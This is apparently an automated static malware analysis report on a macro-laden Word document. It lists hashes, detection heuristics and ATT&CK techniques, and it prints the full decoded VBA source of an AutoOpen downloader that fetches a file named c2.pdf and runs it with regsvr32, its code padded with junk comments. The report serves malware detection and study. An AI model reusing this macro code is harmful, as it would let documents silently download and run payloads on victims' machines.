Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 2446e5fa5a412550…

MALICIOUS

Office (OOXML)

116.4 KB Created: 2020-07-20 09:11:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-09-15
MD5: dd7a6a25fb862a6e16002cda7cd7fbd8 SHA-1: ae565ba4ba3019f8c16b1be79a2d39c2f2dae184 SHA-256: 2446e5fa5a412550fa02b22076d8bac917d219d027fa867fc60a053133288602
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious Office document containing VBA macros. The 'autoopen' subroutine is triggered upon opening, which then calls a 'download' function (not fully shown) with a URL and filename 'c2.pdf'. Subsequently, it executes the downloaded file using the Shell() command. This indicates a downloader functionality, aiming to fetch and run a secondary payload.

Heuristics 6

  • ClamAV: Doc.Downloader.GreenBox5-9139204-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.GreenBox5-9139204-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    ' Sandwich chancellor epa lassitude reference
Shell wu & bn & "32 c2.pdf"
End Sub
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    #If VBA7 And Win64 Then
Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal Iy As LongPtr, ByVal jh As String, ByVal lq As String, ByVal R As LongPtr, ByVal H As LongPtr) As Long
#Else
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
Sub autoopen()
n = ActiveDocument.CustomXMLParts(ActiveDocument.CustomXMLParts.Count).SelectNodes("//Items")(1).ChildNodes(2).Text
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3875 bytes
SHA-256: 0588ff700fd7219be98e79cf721c72f7b538f0e6a1f59213a3676365f6ede2b4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "nb"
Function q2(D)
    
' Maori montreal oakland render
' Reindeer engaged
' Concur
' Individually qualifying

' Efficiently moat superlative downloaded
' Displaying forearm ap magazine funeral
' Neigh
' Controllers largely truant
' Who repentant tepid thirty-one

' Ll
' Muff phases boxer functional
' Film conventions legate insidiously robot shanty

' Magic

' Mimic yours
' Weakening packet beverage guarantees brandon disturbed go-between knob

' Chosen up related
' Delegation key
' Proletariat query veterans collectors
' Legend ron souls
End Function
Sub autoopen()
n = ActiveDocument.CustomXMLParts(ActiveDocument.CustomXMLParts.Count).SelectNodes("//Items")(1).ChildNodes(2).Text

' Horny sealed
' Vodka evaluating

' Mesquite good tutelary
' Receiver
' Lisa
frm.download n, "c2.pdf"

' Corporations obtrude pm crispin
' Firewood fiction variance deg systematically
' Norwegian ratification
' Ebook storm liabilities

' Supplier consisting affront
' Tumults earthenware
' Countryside sm compression parochial edgar
' Largesse islamic
' Enterprises navel camcorder
' Larva cruiser

' Shop expiring hygiene
' Catholic barrage squash disdainful devices
' Readily
' Grandparents stylish
' Monogram creased

' Nice estuary abbreviations bookmarks
' Sandwich chancellor epa lassitude reference
Shell wu & bn & "32 c2.pdf"
End Sub

Attribute VB_Name = "nb1"
Sub e4()

' Propose
' Bali articulate
' Piedmontese follower madonna hoary

' Degenerate
' Number candidacy
' Added examiner
' Resentful thehun interrogate toilette
' Heart-rending weekends
' Harmonize ambien

' Sake africa
' Applaud proportional bali
' Brabant
' Wayne
' Ideas lige

' Prix themselves dimmer
' Begrudge conceptual killed regional

' Suggestions halfway edge
' Stepdaughter dunbar adelaide addition
' Sawn moat rain blocks

' Ventures assembled
' Overdone lenses
' Hypocritical cherry
' Enterprise
' Necklace contumely invitations everyone laconic

' Responsibilities katrina adventure incentive
' Oreilly puzzle treasury placard guano electron
' Emails gratis bestial

' Serious
' Partridge menagerie collector charts traditionary
' Guards emit starting glen
' Maidenhead recipe
' Saucer childbirth subaltern

' Mole integration
' Immorality unreliable recipients

' St allows else eileen
' Db bird died

' Scapegoat essay pj wordy
' Herbs freshmen
' Indebtedness asthma
' Supercilious thaw athletics overcome hunter
' Merge xp

' Discontinued dionysius
' Louse locomotive mastiff crown singer
' Excommunication furtive
End Sub

Attribute VB_Name = "e"
Public Const wu As String = "reg"
Public Const bn As String = "svr"
#If VBA7 And Win64 Then
Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal Iy As LongPtr, ByVal jh As String, ByVal lq As String, ByVal R As LongPtr, ByVal H As LongPtr) As Long
#Else
Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA"(ByVal Iy As Long, ByVal jh As String, ByVal lq As String, ByVal R As Long, ByVal H As Long) As Long
#End If

Attribute VB_Name = "frm"
Attribute VB_Base = "0{6B8018BF-9C83-4DBE-B9EB-D31245ABD666}{86009E6C-7117-4726-AED7-DEA04D3B7763}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub download(url, file)
    URLDownloadToFile 0, url, file, 0, 0
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 27136 bytes
SHA-256: 5980f6b57acd5a407f0bf444bb9caee1923ea97e8b22c72701b419e017280e6e

Open this report in the interactive analyzer, or submit your own file for analysis.